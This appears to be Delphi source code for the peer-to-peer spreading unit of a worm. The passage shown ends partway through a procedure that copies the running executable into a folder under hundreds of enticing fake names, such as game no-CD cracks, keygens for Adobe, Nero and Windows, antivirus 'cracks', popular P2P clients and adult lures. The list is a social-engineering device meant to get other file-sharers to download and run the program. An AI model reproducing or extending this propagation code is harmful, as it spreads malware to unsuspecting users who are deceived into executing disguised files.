unit P2PSpreadUnit;

interface

uses
  windows,minireg,shellapi,CompressionStreamUnit, unitfilemanager;

var
  Dummy: string;
  Num: integer;
  procedure DropFile;
  procedure SpreadFiles(FileName: string; MultiThread: bool);


implementation

function LowerCase(const S: string): string;
var
  Ch     :char;
  L      :integer;
  Source :pchar;
  Dest   :pchar;
begin
  L := Length(S);
  SetLength(Result, L);
  Source := Pointer(S);
  Dest   := Pointer(Result);
  while (L <> 0) do
  begin
    Ch := Source^;
   if (Ch >= 'A') and (Ch <= 'Z') then
      Inc(Ch, 32);
    Dest^ := Ch;
    Inc(Source);
    Inc(Dest);
    Dec(L);
  end;
end;

function IsFolder(FindData: TWIN32FindData): bool;
begin
  Result := False;
  if FindData.dwFileAttributes and $00000010 <> 0 then Result := True;
end;

function IncludeTrailingBackslash(Path: string): string;
begin
  if Copy(Path,Length(Path),1) <> '\' then Path := Path + '\';
  Result := Path;
end;

procedure CopyFiles(Path: string; FileName: string);
begin
  Inc(Num);
  Path := includetrailingbackslash(Path);
CopyFile(pchar(FileName),pchar(Path + '321 Studios GamesXCopy 1.0.8 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + '3D Slot Car Racing Game 1.0.exe'),False);
CopyFile(pchar(FileName),pchar(Path + '3D Studio Max 6 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'ABBY FineReader Pro 7.0 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'acdsee 7.0.61 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'ACDSee PowerPack 7.0.43 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'ACDSee v7.0 Powerpack 7.0 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Ad-aware Pro Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Ad-aware Professional.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Ad-aware.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Adobe Acrobat Reader crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Adobe Acrobat Reader.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Adobe After Effects PRO v6.5 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Adobe Golive v6.0 Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Adobe Illustrator v10.0 Time Limit Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Adobe ImageReady v1.0 crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Adobe PageMaker v7.0 Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Adobe Photoshop 7 keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Adobe Photoshop CS 8 Crack .exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Adobe Photoshop CS Crack .exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Adobe Photoshop Universal Crack .exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Adobe Serial Generator v2.0.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Adult Tetris 2 Crack .exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Age of Empires II The Age of Kings NO CD crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Age Of Mythology - The Titans no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Age Of Mythology no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Agnitum Outpost Firewall 2.5.369 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Ahead Nero Burning 6.6.0.3 Ultra Edition Keygen .exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'AlbumWrap Extractor v1.0.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'AlbumWrap.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Alcohol 120% v1.9.2 build 1705 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Alias Acclaim crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'All Macromedia Products Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'All-in-One Secretmaker.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Anti-Trojan 4.0.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'AnyDVD 3.9.2.1 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'AnyDVD 4.0.4.1 Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'AOL Instant Messenger (AIM).exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'AquaZone Desktop Garden 1.0.1.1 full Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Ares Galaxy.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Ares Lite.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Ashampoo WinOptimizer Platinum Suite 2 2.01.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Avant Browser.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Babylon Pro 5x Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Backyard Baseball 2003 no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Backyard Wrestling 2 - There Goes the Neighborhood crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Battlefield 1942 no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Battlefield Vietnam crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Battlefield Vietnam Multiplayer Online Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Besieger DreamCatcher Interactive crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'BitComet.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'BitSpirit 1.2.0 RC3.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Blindwrite Suite 4.5.3 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Blinx 2 - Masters of Time & Space Microsoft crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Blitzkrieg - Burning Horizon CDV Software GmbH crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'C&C Generals Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Call Of Duty no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'CCALG - Credit Card Generator.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'CD to MP3 Freeware 1.5 .exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Chicken Invaders 2 2.60 .exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'City of Heroes NCsoft crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Civilization III crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Classic NES Series - The Legend of Zelda GBA Nintendo crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Clone DVD 2 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'CloneCD 5.x Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'CloneCD All Version KeyGen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'CloneDVD v1.x crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'CloneDVD v3.x Retail Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'CloneDVD2 v2.x Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Command & Conquer - Generals no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Command & Conquer - Generals Zero Hour no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Command and Conquer - Generals Zero Hour crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Cool Edit 2000 1.1.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'CopyToDVD 3.0.3 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Corel Draw Graphics Suite 12.0 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Counter-Strike Condition Zero Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Crusader Kings Paradox Entertainment crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Cubase Audio XT 3.X crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'CWShredder 2.12 .exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'CyberLink PowerDVD v6.0 Deluxe7 Crack .exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Dark Age Of Camelot - Trials Of Atlantis no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Dark Matter - The Baryon Proj crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'dBpowerAmp Music Converter.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'DC++ 0.668.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Deus Ex Invisible War NO CD Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'DFX Audio Enhancement 2.0.1 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Diablo 2 NO CD crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Dialupass 2.43 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'DivX Player (with DivX Codec).exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'DivX Player Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'dMSN mercury messenger 1.7.0.6.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Doom 3 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Doom 3 NO CD Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Doom 3 SDK Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Dope Wars Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Download Accelerator Plus 7.3.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Download Accelerator Plus V7.1 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Download Accelerator Plus v7.2 Premium Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Download Accelerator Plus.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Dr Divx Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Dr.Divx 1.0.6 Build 105 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Dragon Ball Z - Budokai 3 crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Dragon Ball Z - Supersonic Warriors crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Dragon Warrior VIII crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'DRIV3R crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Drug Wars - Underworld 1.3.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Dungeon Lords DreamCatcher Interactive crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Dungeon Siege no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'DVD Decrypter 3.5.1.0.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'DVD Region-Free 5.5 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'DVD Shrink 3.2.0.15.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'DVDXCopy Platinum 4.0.3.8 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Easy CD-DA Extractor 7.1.3.1 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Easy CD-DA Extractor 7.13.2 Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'eIMAGE Recovery 3.0.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'eMule 0.44b.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'eMule.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Enter the Matrix Atari crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'ESPN NFL 2K5 Sega crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Exe Icon Changer 3.753.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'F.E.A.R. crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Fable Microsoft crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Far Cry crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Fifa 2005 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Final Fantasy VII - Advent Children crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Final Fantasy XI - USA no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Final Fantasy XII crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Fire Emblem - Seima no Kouseki crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'FlashFXP 2 RC2 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'FlashFXP All Version KeyGen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'FlashFXP v1.4.1 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'FlashFXP v1.4.3 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'FlashFXP v2.0 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'FlashFXP v2.1 crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'FlashFXP v2.2 crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Free Internet TV 3.2 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Freedom Force no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Front Mission 4 crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'FrontPage XP 2002 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'FTP Server Serv-U 5.1 Coporate Edition Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Full Spectrum Warrior crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Goblin Commander - Unleash the Horde crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Gran Turismo 4 SCEA crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Grand Theft Auto - San Andreas crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Grand Theft Auto 3 no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Grand Theft Auto III no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Grand Theft Auto San Andreas NO CD crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Grand Theft Auto Vice City NO CD crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Grokster.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Gunbound Trainer.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Half-Life 2 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Half-Life 2 Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Half-Life 2 NO CD Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Halo - Combat Evolved - Microsoft no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Halo 2 crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Harry Potter and the Prisoner of Azkaban Adventure EA Games crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Harry Potter and the Sorcerers Stone no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'HeadStrong WebClicker 2.56.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Heroes of Might and Magic IV no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Hidden and Dangerous 2 NO CD Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'HijackThis.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Icewind Dale 2 no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'ICQ 4.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'ICQ Pro 2003b.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'ImageSlurp 2.43.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'iMesh.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Internet Download Manager 4.03.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Internet Download Manager v4.02 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'IsoBuster Professional v1.7.0.0 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Jedi Academy NO CD Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'JetAudio Basic.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Joint Operations - Typhoon Rising NovaLogic crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Juiced Acclaim crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Kaspersky Anti-Hacker v1.7 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Kaspersky AntiVirus Crack (License Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Kazaa Download Accelerator Pro.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Kazaa Download Manager 3.0.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'KaZaA Lite Plus 1.0.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Kingdom Hearts II crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'K-Lite Codec Pack v2.31 Full Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'K-Lite Mega Codec Pack 1.13 Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Knights Apprentice Memoricks Adventures Games crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'LimeWire (International).exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'LimeWire Download Manager 4.2.6.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'LimeWire server scanner.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'LimeWire.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Longhorn Transformation Pack 8.0.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Lord of the Rings The Battle for Middle-earth 1.00 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'LostGoggles.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'LOTR NO CD Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Macromedia ColdFusion MX crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Macromedia Contribute v2.0 crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Macromedia Director 8 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Macromedia Dreamweaver 4.0 Patch.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Macromedia Dreamweaver MX 2004 7.0 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Macromedia Dreamweaver MX v6.0 crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Macromedia Dreamweaver UltraDev 4.0 Patch.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Macromedia Fireworks 4.0 Patch.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Macromedia Flash 5 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Macromedia Flash All Versions keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Macromedia Flash MX v6.0 crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Macromedia Flash SWF-Unprotect v2.0.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Macromedia FreeHand v10 Loader.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Madden NFL 2003 no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Madden NFL 2005 EA crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Mafia no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'MagicScore maestro 3.5 Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Malice Mud Duck Productions crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Mario Pinball Land Puzzle Nintendo crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Mario Tennis crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Matrix Screensaver.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Max Payne 2 Fall Of Max Payne no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Max Payne 2 NO CD Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Max Payne 2 The Fall of Max Payne NO CD crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'MaxPayne 2 The Fall Of Max Payne Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'McAfee VirusScan 9.0 Crack .exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'McFarlanes Evil Prophecy crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Medal Of Honor - Allied Assault BreakThrough no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Medal Of Honor - Allied Assault no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Medal of Honor Pacific Assault crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Medieval - Total War no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Mega Man Anniversary Collection crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Metal Gear Acid PSP crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Metal Gear Solid 3 - Snake Eater crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Microsoft Flight Simulator 2004 - A Century Of Flight no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Microsoft Office 2000 Regmaker.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Microsoft Office XP Activation Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Microsoft Office XP Activation Killer.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Microsoft Office XP Professional Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Microsoft Office XP Professional Serial.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Microsoft Office XP Universal Activator v1.0.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Microsoft Windows Media Player.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Microsoft Windows Xp Profesional Sp 2 Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Microsoft Windows XP Professional ( Corp key ) Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Midnight Club 3 - DUB Edition crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'mIRC 6.X No CD Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Monopoly 3 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Morpheus.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Mortal Kombat 4 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Mozilla Firefox.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'MP3 Doctor 5.11.15 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'mp3DirectCut 1.38 Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'MS Office XP Activation Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'MS Zoo Tycoon no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'MSN advert remover.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'MSN Messenger (Windows XP).exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'MSN Toolbar advert remover.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'MSN Toolbar.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'MusicMatch Jukebox Plus 9.00 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'MVP Baseball 2004 EA crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'MyIE2.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'NBA Live 2003 crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'NBA Live 2004 crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'NCAA Football 2005 EA crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Need For Speed 5 - no cd.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Need for Speed Hot Pursuit 2 CD KeyGenerator.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Need for speed underground - nocd.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Need for Speed Underground 2 crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Need for Speed Underground 2 NO CD crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Need for Speed Underground Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Need for Speed4 - NOCD.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'NeedforspeedUnderground-nocd.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Nero 6 Ultra Edition 6.6.0.1 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Nero 6 Ultra Edition Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Nero 6 Ultra Edition KeyGen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Nero 6 Ultra Edition.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Nero 6.6.0.1 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Nero 6.6.0.3 Ultra Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Nero Burning Rom 6.6.0.3 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Nero Burning Rom Reloaded 6.6.0.1 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Nero Burning ROM v6.x crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Nero Reloaded 6.6.0.1 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Nero Ultra Edition 6.6.0.1 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'NetPumper Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'NetPumper.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Ninja Gaiden Tecmo crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'NOD32 AntiVirus 2.12.1 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Norman Virus Control 5.70 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'norton 2005 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Norton AntiSpam 2004 Crack .exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Norton AntiVirus 2004 crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Norton AntiVirus 2004 Professional activation Keygen .exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Norton AntiVirus 2004 Professional Edition Keygen .exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'norton AntiVirus 2005 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'norton internet security 2005 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Norton Personal Firewall 2005 retail Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'nVidia nTune 2005 Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Office 2003 Pro Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Onimusha 3 - Demon Siege Adventure Capcom crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Paris Hilton Sex-E Screensaver 1.0.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Partition Magic 8.0.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'PhotoShop CS 8.0 & ImageReady CS 8.0 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'PhotoShop CS v8.0 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'PINNACLE STUDIO PLUS V9.3 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Plus! Media Center Edition Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Pocket Tanks 1.0.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'PornSnatcher 2.31.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'PowerDVD v5.9 Deluxe Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Psi-Ops - The Mindgate Conspiracy Midway crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Purge Jihad Freeform Interactive LLC crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Quake 3 - The Arena NO CD Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'QuickTime.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'RealPlayer crack (keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'RealPlayer Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'RealPlayer.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Red Dead Revolver crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'RegClean 4.1a.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'RegCleaner 4.30.780.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Registry Mechanic 3.0 Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Registry Mechanic Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Registry Mechanic.exe'),False);
